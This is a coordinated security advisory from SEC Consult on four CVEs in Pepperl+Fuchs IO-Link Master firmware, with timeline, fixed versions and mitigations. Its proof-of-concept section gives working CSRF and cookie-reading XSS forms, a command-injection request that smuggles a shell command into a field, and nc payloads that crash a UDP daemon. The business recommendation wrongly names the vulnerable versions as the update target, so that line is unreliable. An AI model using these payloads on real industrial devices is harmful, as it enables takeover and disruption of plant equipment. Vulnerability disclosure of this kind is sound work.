=======================================================================
title: Multiple vulnerabilities
product: Pepperl+Fuchs IO-Link Master Series
See "Vulnerable / tested versions"
vulnerable version: System 1.36 / Application 1.5.28
fixed version: System 1.52 / Application 1.6.11
CVE number: CVE-2020-12511, CVE-2020-12512, CVE-2020-12513,
CVE-2020-12514
impact: High
homepage: https://www.pepperl-fuchs.com
found: 2020-04-23
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Automation is our world. Perfect application solutions are our
goal.
In 1945, Walter Pepperl and Ludwig Fuchs founded a small radio
workshop in
Mannheim, Germany, based on the principles of inventiveness,
entrepreneurial
foresight, and self-reliance. The experience they acquired was
transformed into
new ideas, and they continued to enjoy developing products for
customers. The
eventual result was the invention of the proximity switch. This
innovation rep-
resented the starting point of the company's success story.
Today, Pepperl+Fuchs is known by customers around the world as a
pioneer and an
innovator in electrical explosion protection and sensor technology.
Our main
focus is always on your individual requirements: With a passion for
automation
and groundbreaking technology, we are committed to working in
partnership with
you now and in the future. We understand the demands of your
markets, develop-
ing specific solutions, and integrating them into your
processes."
Source: https://www.pepperl-fuchs.com/usa/en/25.htm
Business recommendation:
------------------------
SEC Consult recommends to update the devices to the newest firmware
packages
(System 1.36 / Application 1.5.28), where the documented issues are
fixed
according to the vendor.
Vulnerability overview/description:
-----------------------------------
1) Cross-Site Request Forgery (CSRF) (CVE-2020-12511)
The web interface that is used to set all configurations, is
vulnerable to
cross-site request forgery attacks. An attacker can change settings
via this
way by luring the victim to a malicious website.
2) Authenticated Reflected POST Cross-Site Scripting
(CVE-2020-12512)
An authenticated reflected cross-site scripting can be triggered by
issuing a
POST request to the "/Software" endpoint which is available on the
web-service.
An attacker can abuse these vulnerabilities to steal cookies from
the attacked
user in order to log on to the device. An attacker is also able to
perform
actions in the context of the attacked user.
3) Authenticated Blind Command Injection (CVE-2020-12513)
A command injection was identified in the web-interface. This
vulnerability is
present because of unfiltered user input that is appended to a
string which
gets executed with "exec()". Commands are executed as root
user.
4) Null Pointer Dereference / DoS in "discoveryd"
(CVE-2020-12514)
The discovery daemon ("discoveryd") is started during the bootup of
the device.
The program is used for the network management program "PortVision
DX". It is
designed with unsafe functions and is vulnerable to a DoS attack.
This is
triggered due to a null dereference in strlen. A debug mode is also
available in
the program. This can be activated by starting the discovery daemon
with
"discoveryd -vv". All inputs are printed to the stdout during its
execution
with this argument. This is not done in the productive device but
can lead to
more severe attacks.
5) Outdated and Vulnerable Software Components
Outdated and vulnerable software components were found on the
device during
a quick examination.
One of the discovered vulnerabilities (CVE-2017-16544) was
verified by using
the MEDUSA scalable firmware runtime.
Proof of concept:
-----------------
1) Cross-Site Request Forgery (CSRF) (CVE-2020-12511)
The following PoC can be used to change the hostname of the device
to "SEC-
Consult":
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form
action="https://$IP/configuration_tab/ajax_comb_table_save/network_config/network_config_schema"
method="POST">
<input type="hidden" name="form"
value="Hostname=SEC-Consult&IPv4mode=static&IPv4address=1.101&IPv4netmask=255.255.255.0&IPv4gateway=1.1.12&DNSmode=manual&IPv4DNS1=&IPv4DNS2=&IpAddrCnflctDetectEnbl=enable&NtpServer=&SyslogServer=&SyslogPort=514&SshServerEnable=disable"
/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
2) Authenticated Reflected POST Cross-Site Scripting
(CVE-2020-12512)
By sending the following request to the web-service, a reflected
cross-site
scripting vulnerability can be triggered:
-------------------------------------------------------------------------------
POST /Software HTTP/1.1
Host: $IP
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Connection: close
Cookie: ui_language=en_US; PHPSESSID=r7jtaceerqeijqr4b2dl0us814
Upgrade-Insecure-Requests: 1
language=german'><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------
The server responds with the following content:
-------------------------------------------------------------------------------
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Content-Length: 11860
Connection: close
Date: Thu, 01 Jan 1970 00:59:46 GMT
Server: lighttpd/1.4.41
[...]
<div class="page-content">
<div class="page-header">
<h1>Software <a
href='/assets/WebHelp/german'><script>alert(document.cookie)</script>/advanced/software.htm'
target='_blank'><img src='/assets/images/question_16.png'
alt='Page-specific Help'></a></h1>
<a class="latest-version" href="#">Check for latest
version</a>
</div>
[...]
-------------------------------------------------------------------------------
PoC-Exploit code for the cross-site scripting vulnerability:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://$IP/Software" method="POST">
<input type="hidden" name="language"
value="german'><script>alert(document.cookie)</script>"
/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
3) Authenticated Blind Command Injection (CVE-2020-12513)
By entering a command in the field "code" under the tab "IO-Link
Test Event
Generation" on the endpoint "/Misc/Settings" that is surrounded by
";", it
gets executed. The following POST request to the web-service
demonstrates this
with the command "ping 127.0.0.1":
-------------------------------------------------------------------------------
POST /index.php/ajax/generate_iolink_event/ HTTP/1.1
Host: $IP
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://$IP/Misc/Settings
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Connection: close
Cookie: ui_language=en_US; PHPSESSID=lh8d4g4e8fm9f1732j9g6bm3a0
mode=single&type=message&instance=unknown&source=local&pdivalid=valid&code=0x0000%3Bping+127.0.0.1%3B
-------------------------------------------------------------------------------
There is no response from the web-service which indicates to the
attacker that
the command was executed. As this was tested on an emulated device
only, the
commands were seen in the process list which proofed that it was
executed
as root:
-bash-4.4# ps
PID USER COMMAND
[...]
216 root /usr/sbin/restoremonitor
272 root /usr/sbin/snmpd -Lsd -Lf /dev/null -p
/var/run/snmpd.pid
333 root /apps/bin/appmgr
347 root 05discoverd
349 root 11iolinkconfigd
353 root 90netconfig-saved
354 root 90netconfig-working
385 root lighttpd -f /apps/www/lighttpd.conf
386 root /usr/bin/php-cgi
387 root /usr/bin/php-cgi
388 root /usr/bin/php-cgi
389 root /usr/bin/php-cgi
390 root /usr/bin/php-cgi
391 root /usr/bin/php-cgi
392 root config waitcmd working network
/apps/bin/updateLighttpdAuth
395 root /usr/bin/php-cgi
397 root -bash
399 root /usr/bin/php-cgi
473 root udhcpc -R -n -O search -p /var/run/udhcpc.eth0.pid -i eth0
-x ho
2519 root [kworker/u3:2]
3173 root sh -c injectEvent -m single -t message -i unknown -s
local -v va
3175 root ping 127.0.0.1
3509 root 50ethernetip
3541 root [10iolinkd]
3544 root ps
4) Null Pointer Dereference / DoS in "discoverd"
(CVE-2020-12514)
Payload for triggering a segmentation fault (caused by a null
pointer dereference):
$ echo -e
"\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x00\x0c\x00\x10\x10"
| nc -u $IP 4606
Program received signal SIGSEGV, Segmentation fault.
0xb6f5dfb4 in strlen () from /lib/libc.so.0
(gdb)
Payload for writing ASCII characters in debug mode ("discoveryd
-vv"). Register
R4 can be controlled via a byte (filled with value "\xab") also in
normal mode
("discoveryd"):
$ echo -e
"\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x01\x0c\x00\x10\xab\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63"
| nc -u $IP 4606
Program received signal SIGSEGV, Segmentation fault.
0xb6f5dfb4 in strlen () from /lib/libc.so.0
(gdb) i r
r0 0x0 0
r1 0x0 0
r2 0xbefffb9b 3204447131
r3 0x0 0
r4 0xab 171
r5 0x1da 474
r6 0xb6f8dbee 3069762542
r7 0x0 0
r8 0x0 0
r9 0x0 0
r10 0xb6ffef74 3070226292
r11 0xbefff574 3204445556
r12 0xb6f5dfb0 3069566896
sp 0xbefff558 0xbefff558
lr 0xaf9c 44956
pc 0xb6f5dfb4 0xb6f5dfb4 <strlen+4>
cpsr 0xa0000010 -1610612720
fpscr 0x0 0
More bytes than in this payload will lead to another program
execution path in
debug mode ("discoveryd -vv").
$ echo -e
"\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x01\x0c\x00\x10\xab\x63\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
| nc -u $IP 4606
Other program paths, depending on the current memory, can be
triggered with
this payload in debug mode due to printf:
$ echo -e
"\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x01\x0c\x00\x10\xab\x63\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
| nc -u $IP 4606
In normal mode, only a null pointer dereference is triggered
which leads to a
program crash.
5) Outdated and Vulnerable Software Components
* PHP 5.6.15
* lighttpd 1.4.41
* OpenSSL 1.0.2j
* Linux Kernel 2.6.30
* BusyBox 1.26.2
The BusyBox shell autocompletion vulnerability (CVE-2017-16544)
was verified on
an emulated device:
A file with the name "\ectest\n\e]55;test.txt\a" was created to
trigger the
vulnerability.
-------------------------------------------------------------------------------
# ls "pressing <TAB>"
test
]55;test.txt
#
-------------------------------------------------------------------------------
The vulnerabilities 1), 2), 3) and 4) were manually verified on
an emulated
device by using the MEDUSA scalable firmware runtime.
Vulnerable / tested versions:
-----------------------------
The IO-Link Master devices are sharing the same firmware base.
The
vulnerabilities were tested on an emulated firmware (system 1.36/
app EIP 1.5.28).
According to the vendor, all firmware versions below 1.5.48 are
vulnerable:
IO-Link Master 4-EIP / <=1.5.48
IO-Link Master 8-EIP / <=1.5.48
IO-Link Master 8-EIP-L / <=1.5.48
IO-Link Master DR-8-EIP / <=1.5.48
IO-Link Master DR-8-EIP-P / <=1.5.48
IO-Link Master DR-8-EIP-T / <=1.5.48
IO-Link Master 4-PNIO / <=1.5.48
IO-Link Master 8-PNIO / <=1.5.48
IO-Link Master 8-PNIO-L / <=1.5.48
IO-Link Master DR-8-PNIO / <=1.5.48
IO-Link Master DR-8-PNIO-P / <=1.5.48
IO-Link Master DR-8-PNIO-T / <=1.5.48
Vendor contact timeline:
------------------------
2020-04-30 | Contacting VDE CERT through
2020-07-29 | Received confirmation from VDE CERT.
2020-07-31 | Call with P+F regarding vulnerabilities from this and
another
advisory.
2020-09-29 | Call with Pepperl+Fuchs and CERT@VDE regarding
status.
2020-10-02 | Received CVE IDs and preliminary advisory from
VDE@CERT.
2020-11-11 | Call with Pepperl+Fuchs regarding the patches. They
should be
available within the next two weeks according to P+F. Agreed
with P+F and VDE CERT to release the security advisory next
year.
2020-12-14 | Received preliminary advisory from P+F. Set
publication date to
2021-01-04.
2021-01-04 | Received final advisory from P+F.
2021-01-13 | Coordinated release of security advisory.
Solution:
---------
Update the firmware to Application 1.6.11 / System 1.52 to resolve
the security
issues.
According to Pepperl+Fuchs, the following steps are recommended to be taken:
"In order to prevent the exploitation of the reported
vulnerabilities, we
recommend that the affected units be updated with the following
three firmware
packages:
- U-Boot bootloader version 1.36 or newer
- System image version 1.52 or newer
- Application base version 1.6.11 or newer
Furthermore, it is always recommended to observe the following
measures if the
affected products are connected to public networks:
1. An external protective measure to be put in place.
Traffic from untrusted networks to the device should be blocked by
a firewall.
Especially traffic targeting the administration webpage.
2. Device user accounts to be enabled with secure passwords.
If non-trusted people/applications have access to the network that
the device
is connected to, then configuring passwords for all three User
Accounts
is recommended."
Pepperl+Fuchs advisory page:
https://www.pepperl-fuchs.com/germany/de/29079.htm
Workaround:
-----------
None
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult, an Atos company
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC
Consult, an
Atos company. It ensures the continued knowledge gain of SEC
Consult in the
field of network and application security to stay ahead of the
attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration
testing and
the evaluation of new offensive and defensive technologies for our
customers.
Hence our customers obtain the most current information about
vulnerabilities
and valid recommendation about the risk profile of new
technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of
SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF T. Weber / @2021